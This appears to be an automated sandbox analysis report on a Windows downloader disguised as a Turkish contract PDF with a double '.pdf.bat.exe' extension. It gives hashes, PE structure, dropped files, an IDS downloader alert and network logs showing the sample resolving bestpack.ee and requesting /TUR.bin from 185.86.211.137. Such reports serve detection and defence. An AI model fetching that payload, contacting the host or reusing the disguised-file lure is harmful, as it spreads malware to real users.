                            Preview:.............L..........................M...................................................................{.........................H.....................................................................................................................................................................................................................................9......8.....'...............}..........................F......................A......aO..........k.....................................................................................P..................................j.......'..:..................................n..............................................~......t.....2...............................................................................{u................................'.................................#.......................................................................t.......j...............r.................................................................

                            C:\Users\user\polaritets\socialmedicin.sej

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):38361
                            Entropy (8bit):1.2166387306020765
                            Encrypted:false
                            SSDEEP:384:X+F+sq/qAweG+1AI4KbEElQxRqKJOPOXALDW3uYBspm5NfXDZ9:X6M/l17oEnYjP
                            MD5:2BF0CAC964058C5B0D73930FC7412775
                            SHA1:003BEC59CB10BDD8B5B760C14DB899637E85AFBE
                            SHA-256:5A823D12E477927D5133F5B4DE1A5BCB0973FDBBDC4C966C821928CB439FC97A
                            SHA-512:303CF2DE6CFC652A10E543E0F6484097042234C786624F1B67668CA254B03DE2CCF4D7EB0FB6E13172F605B1B4B742D8694CF3549952523753C5DDE741975564
                            Malicious:false
                            Preview:......4......;................g....................................V..................s................................................t........................]...L.........................j...........`.....L..................?........o.............................Oq........................................................................F..............................................................V..................................................C.........../.......{................................................................?...............g.............R....4................................w(........................................c..p.................a....................mt...&..............................X........................Z.......................D.................<.......................h..........b..........X........................................................................m...................0...............F............................w.............r.......

                            C:\Users\user\polaritets\toader.txt

                            Download File
                            Process:C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):434
                            Entropy (8bit):4.305884836882498
                            Encrypted:false
                            SSDEEP:12:mBX7vwwJDXCuNQLIU/0vkxuYAz8/p7QTrYSCmDEIHlwq+:mBXUWEzR7ylCeEUw
                            MD5:3F6632F26EBA2C111F54C97312D4C4EA
                            SHA1:8D3FB7505058C8C5CB22133C77213D6B37CDD5F9
                            SHA-256:CE8824C6205F36A17C4476BF02839F065009CD15E88970E653CE5F6A89BD9954
                            SHA-512:EED0879B222E9F074C109B2FA8548F441AD1A4C1CEF8EDB3BAE6D05308E2916061F2A2835E9252A2EDE27608435E40E8C52849B9DD8D38A5FBBEC995628D28E7
                            Malicious:false
                            Preview:kumquat equilibrious invector occludes vesteuroperen knippelfines,laparosplenotomy subagents skatkisternes sovehjertet angiospermous abastard caprate efterbyrdens exercised organisationsliniens puberties..ansvarhavendes unhumidified fordjelsesproces forureningsomraades,nondivisive famle illicitly lithophone lattins cubit rougens svmmebrillerne..untestamental transect subfestively subserviently hyldevarer.maaske pastoral overlooks,

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Entropy (8bit):7.957749119185549
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            File size:567'532 bytes
                            MD5:8681ab3286a883dbfaad479b99aef9d1
                            SHA1:c3df94522f79f288c5178083bb3085bb61f6ce01
                            SHA256:3c74c62451d876da8642fc1b4f1e689b7b6d03aa74dd9baa0aefde62cd3c13b5
                            SHA512:9430594953d979cab8fc58dd493c8bc248cf70051093ac4c415addcf7c2c1c1c39a4c695aa89a6dcf42cb8596302d4d8be5ebe79e317a0b910de3fee5b49e2fb
                            SSDEEP:12288:qX6kgpq5+/10ikjy6jEgMNtTJXPjQewu5xWUPJbbiEUW34/:qX68W1P6jEgMDFjmUBqEUW
                            TLSH:F2C42351F630DA6BD54A3538273B937A05EE3C715150B74A2B64BFBFBC162C0990EAC2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....

                            File Icon

                            Icon Hash:9193c9a1858b8db5

                            Static PE Info

                            General

                            Entrypoint:0x4034fc
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                            Entrypoint Preview

                            Instruction
                            sub esp, 000003F8h
                            push ebp
                            push esi
                            push edi
                            push 00000020h
                            pop edi
                            xor ebp, ebp
                            push 00008001h
                            mov dword ptr [esp+20h], ebp
                            mov dword ptr [esp+18h], 0040A2D8h
                            mov dword ptr [esp+14h], ebp
                            call dword ptr [004080A4h]
                            mov esi, dword ptr [004080A8h]
                            lea eax, dword ptr [esp+34h]
                            push eax
                            mov dword ptr [esp+4Ch], ebp
                            mov dword ptr [esp+0000014Ch], ebp
                            mov dword ptr [esp+00000150h], ebp
                            mov dword ptr [esp+38h], 0000011Ch
                            call esi
                            test eax, eax
                            jne 00007F53E0BBA7FAh
                            lea eax, dword ptr [esp+34h]
                            mov dword ptr [esp+34h], 00000114h
                            push eax
                            call esi
                            mov ax, word ptr [esp+48h]
                            mov ecx, dword ptr [esp+62h]
                            sub ax, 00000053h
                            add ecx, FFFFFFD0h
                            neg ax
                            sbb eax, eax
                            mov byte ptr [esp+0000014Eh], 00000004h
                            not eax
                            and eax, ecx
                            mov word ptr [esp+00000148h], ax
                            cmp dword ptr [esp+38h], 0Ah
                            jnc 00007F53E0BBA7C8h
                            and word ptr [esp+42h], 0000h
                            mov eax, dword ptr [esp+40h]
                            movzx ecx, byte ptr [esp+3Ch]
                            mov dword ptr [00429AD8h], eax
                            xor eax, eax
                            mov ah, byte ptr [esp+38h]
                            movzx eax, ax
                            or eax, ecx
                            xor ecx, ecx
                            mov ch, byte ptr [esp+00000148h]
                            movzx ecx, cx
                            shl eax, 10h
                            or eax, ecx
                            movzx ecx, byte ptr [esp+0000004Eh]

                            Rich Headers

                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x3440.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .ndata0x2a0000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x4c0000x34400x36005950a4e36f0f510396fb34e6e03b573aFalse0.5579427083333334data5.567094918094419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x4c2f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.7190831556503199
                            RT_ICON0x4d1a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7035198555956679
                            RT_ICON0x4da480x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.33963414634146344
                            RT_ICON0x4e0b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6423410404624278
                            RT_ICON0x4e6180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.39381720430107525
                            RT_ICON0x4e9000x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5101351351351351
                            RT_DIALOG0x4ea280x100dataEnglishUnited States0.5234375
                            RT_DIALOG0x4eb280x11cdataEnglishUnited States0.6056338028169014
                            RT_DIALOG0x4ec480xc4dataEnglishUnited States0.5918367346938775
                            RT_DIALOG0x4ed100x60dataEnglishUnited States0.7291666666666666
                            RT_GROUP_ICON0x4ed700x5adataEnglishUnited States0.7111111111111111
                            RT_VERSION0x4edd00x248dataEnglishUnited States0.4811643835616438
                            RT_MANIFEST0x4f0180x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                            Imports

                            DLLImport
                            ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                            SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                            ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                            USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                            GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                            KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-09-25T15:07:40.964897+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049754185.86.211.13780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 25, 2024 15:07:40.528094053 CEST4975480192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.745373011 CEST8049754185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:40.745579958 CEST4975480192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.746475935 CEST4975480192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.963664055 CEST8049754185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:40.964670897 CEST8049754185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:40.964896917 CEST4975480192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.966887951 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.966989994 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:40.967189074 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.992099047 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:40.992161036 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.452126026 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.452300072 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.509857893 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.509871006 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.510159969 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.510401964 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.512887955 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.556181908 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.889275074 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.889416933 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.889451027 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.889564991 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:41.889601946 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.889602900 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.889602900 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.889666080 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:41.889800072 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.110625982 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.110650063 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.110796928 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.110881090 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.110903025 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.110943079 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.111114979 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.111265898 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.111385107 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.111581087 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.111582041 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.111709118 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.147391081 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.147593021 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.147634983 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.333627939 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.333862066 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.333992958 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334326029 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.334537029 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334537983 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334537983 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334537983 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334608078 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334738970 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.334892988 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334893942 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334937096 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.334984064 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.335236073 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.335418940 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.335496902 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.335741997 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.335875034 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.335875034 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.335922003 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.335977077 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.369569063 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.369774103 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.369936943 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.370086908 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.370277882 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.370404005 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.557825089 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.558124065 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.558340073 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.558542013 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.558759928 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559041977 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.559211969 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559299946 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.559381008 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559427023 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.559464931 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559464931 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559561014 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559597015 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.559720993 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559777975 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.559819937 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559819937 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559819937 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.559873104 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.560034037 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.560148954 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.560436010 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.560559034 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.560771942 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.560920000 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.561037064 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.561232090 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.561232090 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.561436892 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.561542988 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.561816931 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.561816931 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.561929941 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.562165976 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.562235117 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.591995001 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.592154980 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592154980 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592253923 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592255116 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592255116 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592313051 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.592353106 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.592516899 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592516899 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592571974 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592683077 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.592889071 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592890024 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592890024 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592890024 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.592967033 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.593003988 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.593246937 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.783629894 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.783909082 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.783960104 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.784001112 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.784212112 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.784267902 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.784648895 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.784847975 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.784847975 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.784967899 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.785109043 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.785298109 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.785341978 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.785630941 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.785811901 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.786031008 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.786550999 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.786724091 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.786900043 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.787328005 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.787549973 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.787609100 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.788114071 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.788269997 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.788371086 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.789015055 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.789180994 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.789314985 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.789752960 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.789936066 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.790146112 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:42.790159941 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.790287018 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.852979898 CEST49755443192.168.11.20185.86.211.137
                            Sep 25, 2024 15:07:42.853001118 CEST44349755185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:50.975052118 CEST8049754185.86.211.137192.168.11.20
                            Sep 25, 2024 15:07:50.975263119 CEST4975480192.168.11.20185.86.211.137
                            Sep 25, 2024 15:08:03.779426098 CEST4975480192.168.11.20185.86.211.137

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 25, 2024 15:07:40.018738031 CEST6158253192.168.11.201.1.1.1
                            Sep 25, 2024 15:07:40.523118973 CEST53615821.1.1.1192.168.11.20

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 25, 2024 15:07:40.018738031 CEST192.168.11.201.1.1.10x86fbStandard query (0)bestpack.eeA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 25, 2024 15:07:40.523118973 CEST1.1.1.1192.168.11.200x86fbNo error (0)bestpack.ee185.86.211.137A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • bestpack.ee

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.11.2049754185.86.211.137806708C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
                            TimestampBytes transferredDirectionData
                            Sep 25, 2024 15:07:40.746475935 CEST163OUTGET /TUR.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                            Host: bestpack.ee
                            Cache-Control: no-cache
                            Sep 25, 2024 15:07:40.964670897 CEST427INHTTP/1.1 301 Moved Permanently
                            Date: Wed, 25 Sep 2024 13:07:40 GMT
                            Server: Apache
                            Location: https://bestpack.ee/TUR.bin
                            Content-Length: 235
                            Content-Type: text/html; charset=iso-8859-1
